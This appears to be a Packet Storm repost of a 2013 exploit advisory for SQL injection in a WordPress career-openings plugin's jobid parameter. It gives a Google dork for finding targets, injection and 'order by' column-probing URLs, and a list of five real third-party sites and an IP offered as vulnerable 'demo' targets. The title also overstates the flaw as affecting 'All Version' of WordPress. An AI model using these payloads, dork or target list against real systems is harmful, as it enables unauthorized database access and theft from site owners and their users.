WordPress Easy Career Openings plugin suffers from a remote SQL injection vulnerability.
91e56fc15be49b466edd276517672364545b3333953f474d6514eecc08deb3a3#######################################################
#
# [+] Exploit Title: Wordpress All Version career details Sql Injection Vulnerability
# [+] Google Dork: inurl:/career-details/?jobid=
# [+] Date: 10/10/2013
# [+] Exploit Author: Iranian_Dark_Coders_Team
# [+] Discovered By: Black.Hack3r
# [+] Version: All Version
# [+] Security Risk: High
# [+] Platforms: php
# [+] Tested on: Windows 7
#
#######################################################
#
# [+] VULNERABILITY:
#
#Wordpress All Version career details Sql Injection Vulnerability
#
#######################################################
#
# [+] Exploit:
#
#http://localhost/[path]/career-details/?jobid=3'[Sql Injection]
#
#######################################################
#
# [+] Proof:
#
#http://localhost/[path]/career-details/?jobid=3+order+by+4-- No Error
#http://localhost/[path]/career-details/?jobid=3+order+by+5-- Error
#
#######################################################
#
# [+] Demo site:
#
#http://www.sheensol.com/career-details?jobid=1
#http://www.stuxbot.co.uk/career-details/?jobid=3
#http://www.op3global.com/career-details/?jobid=3
#http://p2pdevs.com/career-details/?jobid=2
#http://37.58.83.234/~geerling/en/career-details/?jobid=1
#
#######################################################
#
# [+] Discovered By : Black.Hack3r
# [+] We Are : M.R.S.CO,Black.Hack3r,N3O
# [+] SpTnx : Mr.Cicili,Sec4ever,D$@d_M@n,HOt0N,KurD_HaCK3R,MR.0x41,M4H4N,Security,@3is And All Members In wWw.IDC-TeaM.NeT
# [+] Home : http://wWw.IDC-TeaM.NeT
#
#######################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed